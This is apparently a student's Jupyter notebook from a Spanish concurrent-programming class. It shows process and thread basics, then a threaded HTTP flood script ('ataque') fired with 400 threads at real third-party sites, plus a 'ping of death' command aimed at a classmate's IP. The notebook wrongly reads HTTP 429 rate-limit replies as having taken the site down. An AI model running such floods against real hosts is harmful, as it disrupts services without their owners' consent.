<h1 style = "text-align:center">Programación Concurrente y Distribuida </h1>

<a href="https://github.com/elrichardev">

  <img src="ricardo.jpg" title = "Ricardo Delgado Fernández 21844773" alt="Ricardo Delgado Fernández" width="100" height="100" style="float:left; vertical-alig:middle">
    
    </a>

  <img src="uem_logo.jpg" title= "M21" alt="UE" width="105" height="105" style="float:right;vertical-alig:middle">
    
    <br>
    <h2 style = "text-align:center">Class Participation</h2>
    <br><br><br>
    <h2 style = "text-align:left">INDEX </h2>

   

---------------------------------------------------------------------
GLOSARIO DE IMPORTS

In [4]:
import os

In [11]:
import threading

In [5]:
import requests

---------------------------------------------------------------------
NUMERO DE PROCESO Y CUANTOS PROCESOS ESTÁN ACTIVOS

In [52]:
print("El proceso que esta manejando este programa es:", os.getpid())

El proceso que esta manejando este programa es: 19244



<img src="procesos.jpg" title= "numero procesos activos" alt="UE" width="1000" height="1000" style="vertical-alig:middle">

---------------------------------------------------------------------
NUMERO DE CORES LOGICOS Y FISICOS

In [13]:
print("Este equipo tiene un total de  ", os.cpu_count(), "cores logicos")

Este equipo tiene un total de   12 cores logicos


In [12]:
print("Este equipo tiene un total de", os.cpu_count() / 2, "cores físicos")

Este equipo tiene un total de 6.0 cores físicos


---------------------------------------------------------------------
ENUMERAR LOS HILOS LANZADOS

In [24]:
for t in threading.enumerate():
    print(t)

<_MainThread(MainThread, started 7332)>
<Thread(Tornado selector, started daemon 13632)>
<Thread(Thread-4, started daemon 15112)>
<Heartbeat(Thread-5, started daemon 5960)>
<Thread(Tornado selector, started daemon 12044)>
<HistorySavingThread(IPythonHistorySavingThread, started 16772)>
<ParentPollerWindows(Thread-3, started daemon 9076)>



---------------------------------------------------------------------
LANZAR ATAQUES UTILIZANDO UN NÚMERO CONCRETO DE HILOS A UNA DIRECCION


In [4]:
def ataque():
    print(requests.get('https://github.com/sukuzhanay'))
    print("Lanzado el hilo con identificador", threading.current_thread().getName())

In [6]:
requests.get('https://github.com/sukuzhanay')

<Response [200]>

In [7]:
num_hilos=int(input("Digame el numero de hilos"))

Digame el numero de hilos 400


In [8]:
web=input("Dígame la dirección web correctamente formateada")

Dígame la dirección web correctamente formateada https://eburnout.com/


In [9]:
print('Ataque usando', num_hilos)

Ataque usando 400


In [12]:
for i in range(num_hilos):
    threading.Thread(target=ataque).start()

<Response [429]><Response [429]>
Lanzado el hilo con identificador Thread-100
<Response [429]>
Lanzado el hilo con identificador 
Lanzado el hilo con identificador<Response [429]><Response [429]><Response [429]>
Lanzado el hilo con identificador Thread-34
 Thread-99
Thread-95
<Response [429]>
Lanzado el hilo con identificador Thread-96
<Response [429]>
Lanzado el hilo con identificador Thread-101

Lanzado el hilo con identificador Thread-104
<Response [429]><Response [429]>

Lanzado el hilo con identificador Thread-94

Lanzado el hilo con identificador <Response [429]>
Lanzado el hilo con identificador Thread-64
Thread-119
<Response [429]><Response [429]>Lanzado el hilo con identificador 

Lanzado el hilo con identificador Thread-106
<Response [429]>
Lanzado el hilo con identificador Thread-116
Lanzado el hilo con identificador <Response [429]><Response [429]>
Lanzado el hilo con identificador Thread-68
Thread-112
<Response [429]>

Lanzado el hilo con identificador Thread-105
Lanzado e

---------------------------------------------------------------------
QUÉ PÁGINAS CONSIGO TUMBAR?

En algunos ataques con pocos hilos siempre devuelve un Reponse [200], en otros con 400 hilos como este último a eBurnout muesta Reponde [429] 
que nos indica que hemos "tirado" la página web. En el resultado siempre se muestran los hilos que se lanza con un número Thread-25, siempre se lanzan nuevos hilos, no se reutilizan los ya creados por eso va ascendiendo el número del hilo.

---------------------------------------------------------------------
PING DE LA MUERTE

Esta parte la hemos realizado en clase mediante la CMD de Windows, primero miramos nuestra "ipconfig" y luego hacemos un ping a la ip de nuestro compañero mediante el comando "ping ip_address -l 655200 -w 1 -l 1

In [ ]:
Se hacen el envío de paquetes y se reciben de vuelta, los paquetes tienen un valor que se miden en databytes, también se indica el 
tiempo de respuesta. 
El ping de la muerte ya no fu